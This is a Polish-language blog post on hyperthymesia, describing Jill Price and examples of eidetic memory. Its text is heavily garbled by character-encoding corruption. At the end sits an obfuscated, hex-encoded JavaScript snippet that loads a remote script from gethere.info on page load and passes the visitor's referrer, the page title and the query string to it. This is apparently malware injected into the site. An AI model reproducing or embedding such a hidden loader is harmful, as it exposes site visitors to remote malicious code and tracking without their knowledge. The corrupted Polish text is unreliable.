Ludzie, ktA?rzy pamiA�tajA� wszystko

opublikowane w Najnowsze Wpisy, Psychologia | 0

Czy zastanawialiA�cie siA� kiedyA� co by byA�o, gdybyA�my pamiA�tali ze szczegA?A�ami kaA?dy dzieA� naszego A?ycia?A�Czy nie byA�oby to wspaniaA�e a�� A�wspomnienia, ktA?re nigdy nie blednA�? A co ze zA�ymi wspomnieniami? Czy wA?wczas to dar, czy przekleA�stwo?

Pewnie kaA?dy z Was sA�yszaA� o pojA�ciu pamiA�ci doskonaA�ej. To niezwykle rzadkie zjawisko. Osoby obdarzone tA� umiejA�tnoA�ciA� potrafiA� na przykA�ad po jednym usA�yszeniu powtA?rzyA� ciA�g dziesiA�ciu tysiA�cy cyfr od poczA�tku do koA�ca i z powrotem. MogA� teA? posiadaA� doskonaA�A� pamiA�A� fotograficznA�, dziA�ki ktA?rej zapamiA�tujA� wszystko co widzA�. PrzykA�adem takiej pamiA�ci jest Stephen Wiltshire, ktA?ry po 20-minutowym locie helikopterem nad Rzymem potrafiA� odtworzyA� caA�e miasto z kaA?dym najmniejszym szczegA?A�em (rysowaA� je z pamiA�ci na 5 metrowym papierze). Innym znanym przykA�adem pamiA�ci doskonaA�ej jest zdolnoA�A� zapamiA�tywania dA?wiA�kA?w. OdznaczaA� siA� niA� np. Mozart,A�ktA?ry zapamiA�taA� a�zMisererea�? Gregorio Allegri po jednym wysA�uchaniu podczas mszy w kaplicy sykstyA�skiej.

To wszystko przykA�ady tzw. pamiA�ci ejdetycznej, czyli zdolnoA�ci odtwarzania z ogromnA� dokA�adnoA�ciA� obrazA?w czy dA?wiA�kA?w. Jednak czy sA�yszeliA�cie kiedyA� o doskonaA�ej pamiA�ci autobiograficznej?

Na A�wiecie istnieje 6 osA?b, ktA?re pamiA�tajA� prawie kaA?dy dzieA� swojego A?ycia. To niezwykA�e zjawisko zwane hipermnezjA� to zdolnoA�A� nieograniczonego odtwarzania A�ladA?w przeA?yA� psychicznych. MoA?e pojawiaA� siA� podczas hipnozy lub przeA?yA� z pogranicza A�mierci, jednak w szeA�ciu przypadkach wystA�piA�a u osA?b A�wiadomych. JednA� z takich osA?b jest Jill Price.

GdybyA�my chcieli opowiedzieA� historiA� swojego A?ycia, pewnie skA�adaA�aby siA� ona z kluczowych wydarzeA�. Nie jesteA�my w stanie pamiA�taA� wszystkiego. CzA�sto szczA�A�liwe chwile zapisujemy, robimy zdjA�cia, kupujemy pamiA�tki – wszystko po to, by w przyszA�oA�ci mA?c je odtworzyA�. CiA�A?kie przeA?ycia z czasem zapominamy, a jeA�li nie, to na pewno czas prA�dzej czy pA?A?niej i tak zrobi swoje – zepchnie je w podA�wiadomoA�A� i sprawi, A?e przestanA� byA� dla nas bolesne. A co, jeA�li byA�oby to niemoA?liwe? GdybyA�my kaA?dego dnia, z takA� samA� siA�A� pamiA�tali przykre doA�wiadczenia?

Jak siA� okazuje jest ogromna rA?A?nica miA�dzy zwykA�ym pamiA�taniem wydarzeA�, aA�niemoA?noA�ciA� zapominania, na co cierpi Jill Price. „CaA�y czas w mojej gA�owie przesuwajA� siA� wydarzenia z caA�ego A?ycia. Tak jakbym miaA�a dwa ekrany, na ktA?rych puszczane sA� rA?A?ne filmy. DziA� jest 22. rocznica A�lubu ksiA�cia Andrzeja i Sarah Ferguson. Wtedy teA? byA�a A�roda. MA?j przyjaciel miaA� urodziny. I dostaA� mnA?stwo balonA?w. ByA� rok 1968. Tego dnia pojechaA�am teA? zobaczyA� siA� ze znajomym, ktA?ry pracowaA� w Hard Rock Cafe”.- mA?wi Jill. A�Jill odtwarza wydarzenia dokA�adnie tak, jakimi sA� – nie jest w stanie koloryzowaA� ani ich zmieniaA�. Fakt, A?e wA�hipermnezji nie chodzi jedynie o samA� pamiA�A� wydarzeA�, ale o stale silne emocje im towarzyszA�ce powoduje, A?e Jill nieustannie cierpi. Dla niej wszystko jest teraA?niejszoA�ciA�.A�Trudne A?yciowe momenty, upokarzajA�ca walka z otyA�oA�ciA�, problemy w szkole, wyrzuty sumienia, wstyd oraz najbardziej traumatyczne wspomnienie z A?ycia Jill – A�mierA� jej mA�A?a – wszystko to czuje z takA� samA� intensywnoA�ciA� jak kiedyA�.

Z punktu widzenia neurobiologicznego wspomnienia sA� zachowanym wzorcem poA�A�czeA� miA�dzy komA?rkami nerwowymi w mA?zgu. PowstajA� dziA�ki aktywacji synaps w sieci neuronA?w. Im czA�A�ciej dane wspomnienie jest pA?A?niej przywoA�ywane, tym bardziej prawdopodobne, A?e pomiA�dzy komA?rkami nerwowymi stworzone zostanA� trwaA�e poA�A�czenia a�� a reminiscencja trafi do pamiA�ci dA�ugotrwaA�ej. Teoretycznie moA?liwe jest istnienie tak wielu poA�A�czeA�, A?e liczba zachowanych trwale wspomnieA� staje siA� niemal nieograniczona. Dlaczego wiA�c zapominamy? A�Bo gdybyA�my pamiA�tali kaA?de zdarzenie z naszego A?ycia, nasze mA?zgi byA�yby przeciA�A?one i pracowaA�yby duA?o wolniej a�� wyjaA�nia doktor McGaugh. Zapominanie jest niezbA�dnym warunkiem sprawnego funkcjonowania pamiA�ci. WyjA�tkiem jest szeA�A� osA?b na A�wiecie. Naukowy nie wiedzA� jak wyjaA�niA� ten fenomen, a sama Jill ma nadziejA�, A?e moA?e dziA�ki niej dokona siA� postA�p w badaniach nad ludzkA� pamiA�ciA�.

Foto: naukawpolsce.pap.pl


 

 

 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}